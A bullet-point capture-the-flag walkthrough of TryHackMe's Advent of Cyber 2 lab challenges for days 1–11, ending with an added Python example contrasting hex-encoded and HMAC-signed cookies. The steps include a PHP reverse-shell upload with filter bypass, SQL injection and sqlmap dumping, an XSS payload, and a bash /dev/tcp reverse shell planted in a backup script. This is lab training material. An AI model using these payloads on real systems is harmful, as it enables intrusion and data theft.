Advent of Cyber 2
The first 23 days are simple bullet points describing how to do the task. Day 24 is a more complete write-up, as it was a more complete challenge!
Table of Contents
- [Day 1] Web Exploitation: A Christmas Crisis [encoding]
- [Day 2] Web Exploitation: The Elf Strikes Back! [file upload]
- [Day 3] Web Exploitation: Christmas Chaos [brute force]
- [Day 4] Web Exploitation: Santa's watching [brute force / fuzzing]
- [Day 5] Web Exploitation: Someone stole Santa's gift list! [SQLi]
- [Day 6] Web Exploitation: Be careful with what you wish on a Christmas night [XSS]
- [Day 7] Networking: The Grinch Really Did Steal Christmas [pcap]
- [Day 8] Networking: What's Under the Christmas Tree? [nmap]
- [Day 9] Networking: Anyone can be Santa! [ftp]
- [Day 10] Networking: Don't be sElfish! [Samba]
- [Day 11] Networking: The Rogue Gnome [SUID]
- [Day 12] Networking: Ready, set, elf. [msf]
- [Day 13] Special by John Hammond: Coal for Christmas [manual exploit]
- [Day 14] Special by TheCyberMentor: Where's Rudolph? [OSINT]
- [Day 15] Scripting: There's a Python in my stocking! [Python]
- [Day 16] Scripting: Help! Where is Santa? [Python]
- [Day 17] Reverse Engineering: ReverseELFneering [RE x86]
- [Day 18] Reverse Engineering: The Bits of Christmas [RE .NET]
- [Day 19] Special by Tib3rius: The Naughty or Nice List [SSRF]
- [Day 20] Blue Teaming: PowershELlF to the rescue [PowerShell]
- [Day 21] Blue Teaming: Time for some ELForensics [strings, ADS, wmic]
- [Day 22] Blue Teaming: Elf McEager becomes CyberElf [CyberChef]
- [Day 23] Blue Teaming: The Grinch strikes again! [vss]
- [Day 24] Special by DarkStar: The Trial Before Christmas [lots!]

[Day 1] Web Exploitation: A Christmas Crisis [encoding]
- Register and log in
- Check cookies
- Decode using CyberChef
- All numbers and early-in-the-alphabet letters → hex
- Recognise format
- Adjust username and re-encode using CyberChef
- Replace cookie value and refresh page
- Turn everything on → success!

[Day 2] Web Exploitation: The Elf Strikes Back! [file upload]
- Create exploit script as described
- Go to URL including GET request http://<url>/?id=<id-token>
- Check source code for upload types
- Rename script to bypass filter: $ mv php-reverse-shell.php php-reverse-shell.jpg.php
- Upload file. Simple message "File received successfully!"
- Check Burp Suite history - the POST was to /upload, so perhaps /uploads/? Test: http://10.10.35.237/uploads/ → success!
- Also checked page source, found http://10.10.35.237/assets/js/upload.js. It's obfuscated, so use https://beautifier.io/ and http://jsnice.org/ to make sense of it. However, it doesn't seem to give much.
- Hints suggest using a directory brute-forcer
- Set up netcat listener: $ sudo nc -lvnp 443
- Click file from http://10.10.35.237/uploads/, or visit full URL http://10.10.35.237/uploads/php-reverse-shell.jpg.php
- Check netcat, find shell: sh-4.4$ cat /var/www/flag.txt → success!

[Day 3] Web Exploitation: Christmas Chaos [brute force]
- Follow instructions to use Burp Suite to crack
- Intercept login
- Send to Intruder
- Cluster Bomb
- Set Payloads
- Attack
- One result has a different length returned → success!

[Day 4] Web Exploitation: Santa's watching [brute force / fuzzing]
- Example given in the task: wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ
- $ gobuster dir -u http://10.10.176.185/ -w /usr/share/wordlists/dirb/common.txt -x php. Found /api, which led to http://10.10.176.185/api/site-log.php → success!
- $ wfuzz -c -z file,wordlist http://10.10.176.185/api/site-log.php?date=FUZZ (wordlist downloaded from THM). Only one had any characters → success!

[Day 5] Web Exploitation: Someone stole Santa's gift list! [SQLi]
- Find login page. Not /login or /login.php. Nothing in source. Check hint.
- Attempt login using Burp Suite browser, find POST in HTTP history and send to Repeater, then save as panel_login.
- $ sqlmap -r panel_login --batch
- Meanwhile, try the obvious SQLi: santa:' or 1=1 -- → success!
- Try the same ' or 1=1 -- in the panel → success!
- Save the gift database POST request (as above) as gift_db
- $ sqlmap -r gift_db --batch --dump → success!

[Day 6] Web Exploitation: Be careful with what you wish on a Christmas night [XSS]
- Run manual test: add wish of <script>alert('xss');</script>, refresh page, get alert box → XSS
- Use ZAP Automated Scan as suggested

[Day 7] Networking: The Grinch Really Did Steal Christmas [pcap]
- ICMP to view pings
- http.request.method == GET to view HTTP GETs
- frame contains password to find the FTP cleartext password
- Export objects to find the wishlist

[Day 8] Networking: What's Under the Christmas Tree? [nmap]
- $ sudo nmap -A 10.10.27.82 -T4 -v → success!

[Day 9] Networking: Anyone can be Santa! [ftp]
- $ ftp 10.10.222.6 → anonymous
- ftp> ls -la to view current directory contents
- ftp> cd public then view current directory contents
- ftp> get shoppinglist.txt to download the file, then view it with $ cat
- ftp> get backup.sh then edit to include bash -i >& /dev/tcp/10.4.5.126/4242 0>&1
- $ nc -lvnp 4242 then wait for shell
- root@tbfc-ftp-01:~# cat /root/flag.txt → success!

[Day 10] Networking: Don't be sElfish! [Samba]
- $ enum4linux -a 10.10.122.80 to see what's available
- $ smbclient //10.10.122.80/tbfc-santa to access share (no password)

[Day 11] Networking: The Rogue Gnome [SUID]
- find / -perm -u=s -type f 2>/dev/null
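Added example (not from the write-up or the challenge) showing what the Day 1 cookie step above amounts to: a cookie that is only hex-encoded (which is why the decoded value shows nothing but digits and a-f) accepts any re-encoded username, while the same payload with an HMAC tag rejects the edit. The JSON layout, field names and secret are constructed for illustration, not taken from the challenge.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed server-side key for the signed variant; not the challenge's value.
SECRET = b"constructed-secret-not-the-real-one"


def make_encoded_cookie(username: str) -> str:
    """Cookie in the style the write-up decodes: JSON, hex-encoded, no signature."""
    payload = {"company": "The Best Festival Company", "username": username}
    return json.dumps(payload).encode().hex()


def read_encoded_cookie(cookie: str) -> dict:
    """Decode-only check: whatever the hex decodes to is trusted as the session."""
    return json.loads(bytes.fromhex(cookie))


def make_signed_cookie(username: str) -> str:
    """Same hex body, followed by an HMAC-SHA256 tag computed over it."""
    body = make_encoded_cookie(username)
    tag = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def read_signed_cookie(cookie: str) -> Optional[dict]:
    """Return the session only when the tag verifies; None on any tampering."""
    body, _, tag = cookie.partition(".")
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None  # body was edited, tag is missing, or key differs
    return json.loads(bytes.fromhex(body))


def reencode_username(cookie: str, new_username: str) -> str:
    """The write-up's 'adjust username and re-encode' step, keeping any tag as-is."""
    body, dot, tag = cookie.partition(".")
    data = json.loads(bytes.fromhex(body))
    data["username"] = new_username
    return json.dumps(data).encode().hex() + dot + tag
```

The decode-only reader cannot tell a re-encoded cookie from a genuine one; only the signed reader detects the change, so the fix is a server-held key, not a less obvious encoding.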